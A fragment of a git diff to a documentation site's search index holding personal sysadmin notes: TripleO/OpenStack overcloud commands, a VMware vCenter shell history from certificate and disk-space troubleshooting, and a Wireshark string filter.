    "},{"location":"tripleo/#get-extra-hardware-specs-from-ironic","title":"Get extra-hardware-specs from Ironic.","text":"
    openstack baremetal introspection data save 32124951-3fcc-4da4-ba16-d05a3c66bb22\n
    "},{"location":"tripleo/#delete-deployed-overcloud","title":"Delete deployed Overcloud","text":"
    (undercloud) [stack@ooo-director ~]$ openstack stack list\n+--------------------------------------+------------+----------------------------------+--------------------+----------------------+--------------+\n| ID                                   | Stack Name | Project                          | Stack Status       | Creation Time        | Updated Time |\n+--------------------------------------+------------+----------------------------------+--------------------+----------------------+--------------+\n| a078f570-c4fa-46bc-87d5-ebb2c99684e4 | overcloud  | 8a6fa7c4e66a422281bd800007c65e4d | CREATE_IN_PROGRESS | 2019-12-26T04:00:21Z | None         |\n+--------------------------------------+------------+----------------------------------+--------------------+----------------------+--------------+\n\n#Might need to do 2-3 times... (not sure why)\n(undercloud) [stack@ooo-director ~]$ openstack stack delete a078f570-c4fa-46bc-87d5-ebb2c99684e4\nAre you sure you want to delete this stack(s) [y/N]? y\n\n\nopenstack overcloud plan delete overcloud\n
    "},{"location":"tripleo/#list-overcloud-nodes-profiles","title":"List Overcloud nodes profiles","text":"
    openstack overcloud profiles list\n
    "},{"location":"tripleo/#set-computecontroller-profile","title":"Set compute/controller profile","text":"
    openstack baremetal node set --property capabilities='profile:compute,boot_option:local' \n
    "},{"location":"vmware/","title":"Vmware","text":"
    1  df -h\n2  cd /storage/log/\n3  ls\n4  cd vmware/\n5  ls\n6  du -a /var | sort -n -r | head -n 10\n7  du h-a /var | sort -n -r | head -n 10\n8  df -h\n9  cd ..\n

    10 du h-a /var | sort -n -r | head -n 10 11 cd /var/log/ 12 ls 13 du -ha /var | sort -n -r | head -n 10 14 ls -alh 15 cd vmware 16 ls 17 du -ha /var | sort -n -r | head -n 10 18 ls -alh 19 du -ha /var | sort -n -r | head -n 100 20 ls -alh /storage/log/vmware/sso/tomcat/ 21 du -hs /storage/log/vmware/sso/tomcat/ 22 du -hs /storage/log/vmware 23 du -hs /storage/log/vmware/eam/ 24 du -hs /storage/log/vmware/lookupsvc/ 25 du -hs /storage/log/vmware/lookupsvc/tomcat/ 26 ls -alh /storage/log/vmware/lookupsvc/tomcat/ 27 du -hs /storage/log/vmware/lookupsvc/tomcat/ 28 rm /storage/log/vmware/lookupsvc/tomcat/localhost_access.2021- 29 df -h 30 /usr/lib/vmware-vmca/bin/certificate-manager 31 cat /var/log/vmware/vmcad/certificate-manager.log 32 ping colo.coldnorthadmin.com 33 /usr/lib/vmware-vmca/bin/certificate-manager 34 ping 10.199.199.1 35 dig google.ca 36 dig colo.coldnorthadmin.com 37 dig vcenter.colo.coldnorthadmin.com 38 clear 39 /usr/lib/vmware-vmca/bin/certificate-manager 40 cd/etc/vmware-sso 41 cd /etc/vmware-sso 42 ls 43 cd keys/ 44 ls 45 history | grep vcenter 46 ls 47 ls -alh 48 cat ssoserverRoot.crt 49 htop 50 top 51 service-control --status 52 toptop 53 top 54 service-control --status 55 watch -n 1 \"service-control --status\" 56 cd /etc/ssl/certs 57 ls 58 ls -alh 59 service-control 60 service-control --help 61 service-control --start vmware-vapi-endpoint 62 service-control 63 service-control --list-status 64 service-control --status 65 /usr/lib/vmware-vmafd/bin/dir-cli 66 cd /usr/lib/vmware-vmafd/bin/dir-cli 67 tail -n 100 /var/log/vmware/vpxd/vpxd.log 68 date 69 tail -n 100 /var/log/vmware/vpxd/vpxd.log 70 grep -ir ssl /var/log/vmware/vpxd/vpxd.log 71 cd /etc/vm 72 cd /etc/vmware 73 ls 74 cat backup/ 75 cat .buildInfo 76 /usr/lib/vmware-vmca/bin/certificate-manager 77 cd /tmp/vmware-root 78 ls 79 cd /var/log/vmware 80 ls 81 tail -n 100 vpxd/vpxd.log 82 service-control --status 83 /usr/lib/vmware-vmafd/bin/vecs-cli entry list --store TRUSTED_ROOTS --text | less 84 usr/lib/vmware-vmafd/bin/vecs-cli entry list --store MACHINE_SSL_CERT --text | less 85 usr/lib/vmware-vmafd/bin/vecs-cli entry list --store MACHINE_SSL_CERT --text 86 /usr/lib/vmware-vmafd/bin/vecs-cli entry list --store MACHINE_SSL_CERT --text 87 /usr/lib/vmware-vmafd/bin/vecs-cli entry list --store vpxd --text | less 88 /usr/lib/vmware-vmafd/bin/vecs-cli entry list --store vsphere-webclient --text | less 89 cd /tmp/ 90 vi fixsts.sh 91 chmod +x fixsts.sh 92 ./fixsts.sh 93 service-control --stop --all 94 service-control --start --all 95 top 96 cd /var/log/vmware/vapi/ 97 ls 98 cd endpoint/ 99 ls 100 tail -n 100 -f endpoint.log 101 /usr/lib/vmware-vmca/bin/certificate-manager 102 tail -n 100 /var/log/vmware/vmcad/certificate-manager.log 103 ping vcenter.colo.coldnorthadmin.com 104 reset 105 tail -n 100 /var/log/vmware/vmcad/certificate-manager.log 106 /usr/lib/vmware-vmca/bin/certificate-manager 107 cat /etc/hostname 108 /usr/lib/vmware-vmca/bin/certificate-manager 109 tail -n 100 /var/log/vmware/vmcad/certificate-manager.log 110 python /usr/lib/vmidentity/tools/scripts/lstool.py list --url http://localhost:7080/lookupservice/sdk | less 111 python /usr/lib/vmidentity/tools/scripts/lstool.py list --url http://vcenter.colo.coldnorthadmin.com:7080/lookupservice/sdk | less 112 ls /usr/lib/vmidentity/tools/scripts/lstool.py 113 ls /usr/lib/vmware-lookupsvc/tools/lstool.py 114 python /usr/lib/vmware-lookupsvc/tools/lstool.py list --url http://vcenter.colo.coldnorthadmin.com:7080/lookupservice/sdk | less 115 clear 116 cd /usr/lib/vmware/site-packages/cis 117 ls 118 cp certificateManagerHelper.py certificateManagerHelper.py.bak 119 vi certificateManagerHelper.py 120 reset 121 /usr/lib/vmware-vmca/bin/certificate-manager 122 clear 123 htop 124 clear 125 df -h 126 history

    "},{"location":"wireshark/","title":"Wireshark","text":""},{"location":"wireshark/#get-packets-containing-a-specific-string","title":"Get packets containing a specific string.","text":"
    frame contains potato\n
    "}]} \ No newline at end of file diff --git a/sitemap.xml.gz b/sitemap.xml.gz index 9090924c859238c6dac72b0016c9428a4f7ae772..bdea8a1f6ae9a281178fcceed9cb6ab414abda7e 100644 GIT binary patch delta 13 Ucmb=gXP58h;0UM;o5)@P02?3!?*IS* delta 13 Ucmb=gXP58h;Bc_wpU7ST02pZlSpWb4